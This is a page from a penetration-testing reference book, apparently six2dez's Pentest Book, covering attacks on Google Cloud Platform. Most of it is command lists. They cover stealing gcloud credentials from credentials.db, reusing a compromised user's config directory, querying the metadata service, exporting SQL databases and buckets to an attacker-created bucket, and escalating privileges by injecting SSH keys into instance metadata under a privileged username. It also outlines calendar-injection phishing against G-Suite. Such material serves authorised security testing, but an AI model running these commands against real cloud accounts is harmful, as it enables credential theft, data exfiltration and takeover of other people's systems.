Pentest Book
Search…
/home/six2dez/.pentest-book
Contribute/Donate
Recon
Public info gathering
AIO Recon Tools
Domain Enum
Subdomain Enum
Network Scanning
Host Scanning
Packet Scanning
Enumeration
Files
SSL/TLS
Ports
Web Attacks
Web Technologies
Cloud
General
Cloud Info Gathering
AWS
Azure
GCP
Docker && Kubernetes
CDN - Comain Fronting
Exploitation
Payloads
Reverse Shells
File transfer
Post Exploitation
Linux
Pivoting
Windows
Mobile
General
Android
iOS
Others
Burp Suite
Password cracking
VirtualBox
Code review
Pentesting Web checklist
Internal Pentest
Web fuzzers review
Recon suites review
Subdomain tools review
Random
Master assessment mindmaps
BugBounty
Exploiting
tools everywhere
Powered By GitBook
GCP

General

1
**Tools**
2
# Hayat https://github.com/DenizParlak/hayat
3
# GCPBucketBrute https://github.com/RhinoSecurityLabs/GCPBucketBrute
4
# GCP IAM https://github.com/marcin-kolda/gcp-iam-collector
5
# GCP Firewall Enum: https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_firewall_enum
6
7
Auth methods:
8
• Web Access
9
• API – OAuth 2.0 protocol
10
• Access tokens – short lived access tokens for service accounts
11
• JSON Key Files – Long-lived key-pairs
12
• Credentials can be federated
13
14
Recon:
15
• G-Suite Usage
16
◇ Try authenticating with a valid company email address at Gmail
17
18
Google Storage Buckets:
19
• Google Cloud Platform also has a storage service called “Buckets”
20
• Cloud_enum from Chris Moberly (@initstring) https://github.com/initstring/cloud_enum
21
◇ Awesome tool for scanning all three cloud services for buckets and more
22
▪ Enumerates:
23
- GCP open and protected buckets as well as Google App Engine sites
24
- Azure storage accounts, blob containers, hosted DBs, VMs, and WebApps
25
- AWS open and protected buckets
26
27
Phising G-Suite:
28
• Calendar Event Injection
29
• Silently injects events to target calendars
30
• No email required
31
• Google API allows to mark as accepted
32
• Bypasses the “don’t auto-add” setting
33
• Creates urgency w/ reminder notification
34
• Include link to phishing page
35
36
Steal Access Tokens:
37
• Google JSON Tokens and credentials.db
38
• JSON tokens typically used for service account access to GCP
39
• If a user authenticates with gcloud from an instance their creds get stored here:
40
~/.config/gcloud/credentials.db
41
sudo find /home -name "credentials.db"
42
• JSON can be used to authenticate with gcloud and ScoutSuite
43
44
Post-compromise
45
• Cloud Storage, Compute, SQL, Resource manager, IAM
46
• ScoutSuite from NCC group https://github.com/nccgroup/ScoutSuite
47
• Tool for auditing multiple different cloud security providers
48
• Create Google JSON token to auth as service account
Copied!

Enumeration

1
# Authentication with gcloud and retrieve info
2
gcloud auth login
3
gcloud auth activate-service-account --key-file creds.json
4
gcloud auth activate-service-account --project=<projectid> --key-file=filename.json
5
gcloud auth list
6
gcloud init
7
gcloud config configurations activate stolenkeys
8
gcloud config list
9
gcloud organizations list
10
gcloud organizations get-iam-policy <org ID>
11
gcloud projects get-iam-policy <project ID>
12
gcloud iam roles list --project=<project ID>
13
gcloud beta asset search-all-iam-policies --query policy:"projects/xxxxxxxx/roles/CustomRole436" --project=xxxxxxxx
14
gcloud projects list
15
gcloud config set project <project name>
16
gcloud services list
17
gcloud projects list
18
gcloud config set project [Project-Id]
19
gcloud source repos list
20
gcloud source repos clone <repo_name>
21
22
# Virtual Machines
23
gcloud compute instances list
24
gcloud compute instances list --impersonate-service-account AccountName
25
gcloud compute instances list --configuration=stolenkeys
26
gcloud compute instances describe <instance id>
27
gcloud compute instances describe <InstanceName> --zone=ZoneName --format=json | jq -c '.serviceAccounts[].scopes[]'
28
gcloud beta compute ssh --zone "<region>" "<instance name>" --project "<project name>"
29
# Puts public ssh key onto metadata service for project
30
gcloud compute ssh <local host>
31
curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H &#39;Metadata-Flavor:Google’
32
# Use Google keyring to decrypt encrypted data
33
gcloud kms decrypt --ciphertext-file=encrypted-file.enc --plaintext-file=out.txt --key <crypto-key> --keyring <crypto-keyring> --location global
34
35
# Storage Buckets
36
List Google Storage buckets
37
gsutil ls
38
gsutil ls -r gs://<bucket name>
39
gsutil cat gs://bucket-name/anyobject
40
gsutil cp gs://bucketid/item ~/
41
42
# Webapps & SQL
43
gcloud app instances list
44
gcloud sql instances list
45
gcloud spanner instances list
46
gcloud bigtable instances list
47
gcloud sql databases list --instance <instance ID>
48
gcloud spanner databases list --instance <instance name>
49
50
# Export SQL databases and buckets
51
# First copy buckets to local directory
52
gsutil cp gs://bucket-name/folder/ .
53
# Create a new storage bucket, change perms, export SQL DB
54
gsutil mb gs://<googlestoragename>
55
gsutil acl ch -u <service account> gs://<googlestoragename>
56
gcloud sql export sql <sql instance name> gs://<googlestoragename>/sqldump.gz --database=<database name>
57
58
# Networking
59
gcloud compute networks list
60
gcloud compute networks subnets list
61
gcloud compute vpn-tunnels list
62
gcloud compute interconnects list
63
gcloud compute firewall-rules list
64
gcloud compute firewall-rules describe <rulename>
65
66
# Containers
67
gcloud container clusters list
68
# GCP Kubernetes config file ~/.kube/config gets generated when you are authenticated with
69
gcloud container clusters get-credentials <cluster name> --region <region>
70
kubectl cluster-info
71
72
# Serverless (Lambda functions)
73
gcloud functions list
74
gcloud functions describe <function name>
75
gcloud functions logs read <function name> --limit <number of lines>
76
# Gcloud stores creds in ~/.config/gcloud/credentials.db Search home directories
77
sudo find /home -name "credentials.db
78
# Copy gcloud dir to your own home directory to auth as the compromised user
79
sudo cp -r /home/username/.config/gcloud ~/.config
80
sudo chown -R currentuser:currentuser ~/.config/gcloud
81
gcloud auth list
82
83
# Databases
84
gcloud sql databases list
85
gcloud sql backups list --instance=test
86
87
# Metadata Service URL
88
# metadata.google.internal = 169.254.169.254
89
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" -H
90
"Metadata-Flavor: Google"
91
92
# Interesting metadata instance urls:
93
http://169.254.169.254/computeMetadata/v1/
94
http://metadata.google.internal/computeMetadata/v1/
95
http://metadata/computeMetadata/v1/
96
http://metadata.google.internal/computeMetadata/v1/instance/hostname
97
http://metadata.google.internal/computeMetadata/v1/instance/id
98
http://metadata.google.internal/computeMetadata/v1/project/project-id
99
100
# Get access scope
101
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor:Google'
102
103
# Get snapshot from instance and create instance from it
104
gcloud compute snapshots list
105
gcloud compute instances create instance-2 --source-snapshot=snapshot-1 --zone=us-central1-a
Copied!

Attacks

1
# Check ssh keys attached to instance
2
gcloud compute instances describe instance-1 --zone=us-central1-a --format=json | jq '.metadata.items[].value'
3
# Check for "privilegeduser:ssh-rsa" and generate ssh keys with same username and paste in file
4
ssh-keygen -t rsa -C "privilegeduser" -f ./underprivuser
5
# Something like:
6
privilegeduser:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDFGrK8V2k0xBeSzN+oUgnRLSIgUED7ayeUJJ10ryEFR0xJbFeGsRAL5LUzw1DTT9gRKmcMTjmZNU3E99bwyytV0fLnGVRIZ63oC8IdTESR0g8EnU6yam/ntq6gZF5QRcES3gaZlnssOQQhw0rvcCB7o5oM1zCDQtgJXAu/2UI6yKf3xdlcHdrULbKTR+0c7r2FWMLgdghGsA+yH3leHJWjDE/WJ1mqf+ZE+RvwLZ8TmVFJmI37xoKEeVnkmOrOe/TMYvtuzSQduHEUhhfjB8YPUYH7dGHyVPlRp/0Hsrjauf5//zNN9dyAZisElgF7CnJmtJVizfDxlXd/nwrVC8nf2xzbi8nc24STfTg3+lR1f73Z5xN9waPl3eHMNy7nXvShxSO01ZwwuyTmjNh83ik1PJjNU= privilegeduser
7
privilegeduser:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDnLriKvJcwZ2eRUbYpy7ZiZrZub+ZblHgKhATPnRjEXK7Q5U3vOFutCeMavxQ82yIwne6b6LzDAfKeS6wlez1ll2npGhKpb8mAM+ZIKxdTAoAhenOlLlmMyYHhJs/UjkTtj7TZDIEa/uZjZgClK5fmgkYjprsRbPOtAru8fBAOAWfMtrXYFmUJy94iMIvYpRuUPTZ0XUkzmyETNspZOwoOd+K2yTmFor4mWIgTzbaeAtJA+b+nQmXM1Ya1RfalpQsomXnkhqihh/wmqJMDGIJT1YgepMxbj4wy5WyUlE4Ub+/Wh7Lyu51jaRJ++FYh/pgb3m3d8t7B6b2Jj7ldxicQSPu6Mc9TZ5QrPx91dOe/Mzmte2kW7AF8xXo+Se71Ffc5csupUo62uyeXt12F+qNiqHeJXSomxck7rRwonnUhyNJ2icCPogsbDNDjHvdXmGsrXNFU= privilegeduser
8
# Upload the file with the 2 keys and access to the instance
9
gcloud compute instances add-metadata instance-1 --metadata-from-file ssh-keys=keys.txt --zone us-central1-a
10
ssh -i underprivuser [email protected]
11
12
# Re-authentication the account keys
13
# Find keys in instance
14
cd /home/<username>/.config/gcloud
15
cat credentials.db
16
# Copy the credentials, make a new json file inside your computer and paste it.
17
gcloud auth activate-service-account --key-file <file>.json
18
# Now can access API
Copied!
Previous
Azure
Next
Docker && Kubernetes
Last modified 10mo ago
Export as PDF
Copy link
Contents
General
Enumeration
Attacks